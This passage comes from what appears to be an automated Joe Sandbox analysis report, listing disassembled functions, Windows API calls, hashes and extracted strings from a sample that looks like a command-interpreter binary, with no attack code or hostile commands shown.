                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$EnvironmentFreeProcessVariable
                                                      • String ID:
                                                      • API String ID: 2643372051-0
                                                      • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                      • Instruction ID: 057bb0f319481f7d1869f57c90cecc99223403de147e35276248c35a7a42a83b
                                                      • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                      • Instruction Fuzzy Hash: D9F02662A09B4281EB04FB25F402274EAE0FF4D7A0BC58236C93E43390CFBC80408251
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _get_osfhandle$ConsoleMode
                                                      • String ID:
                                                      • API String ID: 1591002910-0
                                                      • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                      • Instruction ID: 216e250ae6028ed110bb4dc2e752556e834848768ba7dcd4d40c82de3a7cc494
                                                      • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                      • Instruction Fuzzy Hash: F1F07A35E09612DBE708EB11E846278BBA0FB8D712F849176C90E43318DFBDA6158B52
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: DriveType
                                                      • String ID: :
                                                      • API String ID: 338552980-336475711
                                                      • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                      • Instruction ID: b48dd3106c801b34b5690048f068c129aba883d9bf9a6e9cffd87956715695bb
                                                      • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                      • Instruction Fuzzy Hash: 17E0E56361860086D720DB60E05216AF760FB8D348FC41535DA8D83724DB3CC149CF08
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDA6
                                                        • Part of subcall function 00007FF7E1DBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDBD
                                                      • GetConsoleTitleW.KERNELBASE ref: 00007FF7E1DC5B52
                                                        • Part of subcall function 00007FF7E1DC4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7E1DC4297
                                                        • Part of subcall function 00007FF7E1DC4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7E1DC42D7
                                                        • Part of subcall function 00007FF7E1DC4224: memset.MSVCRT ref: 00007FF7E1DC42FD
                                                        • Part of subcall function 00007FF7E1DC4224: memset.MSVCRT ref: 00007FF7E1DC4368
                                                        • Part of subcall function 00007FF7E1DC4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7E1DC4380
                                                        • Part of subcall function 00007FF7E1DC4224: wcsrchr.MSVCRT ref: 00007FF7E1DC43E6
                                                        • Part of subcall function 00007FF7E1DC4224: lstrcmpW.KERNELBASE ref: 00007FF7E1DC4401
                                                      • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7E1DC5BC7
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                      • String ID:
                                                      • API String ID: 497088868-0
                                                      • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                      • Instruction ID: edc33e9e8be908d7abf96c7fe26e3ee58fdd66b423c3ae8458e08e92c3e1645d
                                                      • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                      • Instruction Fuzzy Hash: 86318660B0C64252EB24F711A4527BDE251FF89B80FC45533E94E87B95DEBCE501C751
                                                      APIs
                                                      • FindClose.KERNELBASE(?,?,?,00007FF7E1DDEAC5,?,?,?,00007FF7E1DDE925,?,?,?,?,00007FF7E1DBB9B1), ref: 00007FF7E1DC3A56
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CloseFind
                                                      • String ID:
                                                      • API String ID: 1863332320-0
                                                      • Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                      • Instruction ID: c8b5453b1c63f017124b129981859bc0cfd8525adc06bba8e176699ac133d0d3
                                                      • Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                                      • Instruction Fuzzy Hash: 8C01D620E08A87A5E754E719A541376E7A0FF88B40BD0D832D50DC2244DEBCF5A1C791
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::cancel_current_taskmalloc
                                                      • String ID:
                                                      • API String ID: 1412018758-0
                                                      • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                      • Instruction ID: c141a1231c0784de808bbc5dc15d594d55d3f3aa7a6d97349a80aab13a6c33dc
                                                      • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                      • Instruction Fuzzy Hash: B9E06D01F0920B91FF1CBBA668433B592505F18B41E981832DD0E45382EEBCA092C3B2
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDA6
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDBD
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcess
                                                      • String ID:
                                                      • API String ID: 1617791916-0
                                                      • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                      • Instruction ID: e5378ca871b63f4bd2260f7fbee4b83aaaac386cbc538f7548cc47fa8c93c057
                                                      • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                      • Instruction Fuzzy Hash: 3DF08171E1864292EB04EB05F842279FBA0FB89B00BD99436D90E03358DF7CE451CB21
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: exit
                                                      • String ID:
                                                      • API String ID: 2483651598-0
                                                      • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                      • Instruction ID: 3b7111ea554a2566a935c7083ea295116cedc959218ebbbb6273de37de37a98d
                                                      • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                      • Instruction Fuzzy Hash: 62C01230B0464687EB2DB731655213995A55B08201F445839C50781291DEBCD404C651
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: DefaultUser
                                                      • String ID:
                                                      • API String ID: 3358694519-0
                                                      • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                      • Instruction ID: 6a13f1da88f1832a94415aa2d532eca9800ca3ee00203dc3715e58e649fc3df6
                                                      • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                                      • Instruction Fuzzy Hash: A7E0C2E2E282538AF7587E4160833B49953CB78782FC44833C60D812C54A7D3841D62A
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset
                                                      • String ID:
                                                      • API String ID: 2221118986-0
                                                      • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                      • Instruction ID: 949c500cb173571034c3ff60e986ffb564b611ad2e03e88f6bb6363581f32aa7
                                                      • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                      • Instruction Fuzzy Hash: 3CF0B421B0978540EB44D756B94126A92919B88BF0B888332EA7D47BC5DF7CD452C701
                                                      APIs
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD7F44
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DD7F5C
                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD7F9E
                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD7FFF
                                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8020
                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8036
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8061
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DD8075
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD80D6
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DD80EA
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DD8177
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DD819A
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DD81BD
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DD81DC
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DD81FB
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DD821A
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DD8239
                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8291
                                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD82D7
                                                      • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD82FB
                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD831A
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8364
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DD8378
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD839A
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD83AE
                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD83E6
                                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8403
                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8418
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                      • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                      • API String ID: 3637805771-3100821235
                                                      • Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                      • Instruction ID: 50b8edd5e4967aa8ef46c3fbe87ce29722abfbdbb7da3e4a53c604d6d72cf0f7
                                                      • Opcode Fuzzy Hash: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                      • Instruction Fuzzy Hash: 1DE1B371E08A528AE714EF65E401279FBA1FB89B95BC48236CD0E83794DFBCA454C721
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                      • String ID: DPATH
                                                      • API String ID: 95024817-2010427443
                                                      • Opcode ID: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                      • Instruction ID: d2b2fc0f614502a16793e8695fb2de72e3948192ca774fda0629f41a764c7a8c
                                                      • Opcode Fuzzy Hash: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                      • Instruction Fuzzy Hash: A712E932A0868297EB25EF259441379F7A1FF89754F84523AEA4E53B94DF7CE400CB12
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1703067007.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000005.00000002.1703051134.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703112703.00007FF7E1E04000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000005.00000002.1703180425.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                      • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                      • API String ID: 1795611712-3662956551
                                                      • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                      • Instruction ID: e221b39cc7f47288ab9205f581d82e3da46226a49a7ba4837ed2038dd9771ab8
                                                      • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                      • Instruction Fuzzy Hash: A7E1C362E0C64296E711EB64A8427B9E7A1FF48784FC44233D90E87698DFBCE544C762
                                                      APIs
                                                      • _wcsupr.MSVCRT ref: 00007FF7E1DDEF33
                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDEF98
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDEFA9
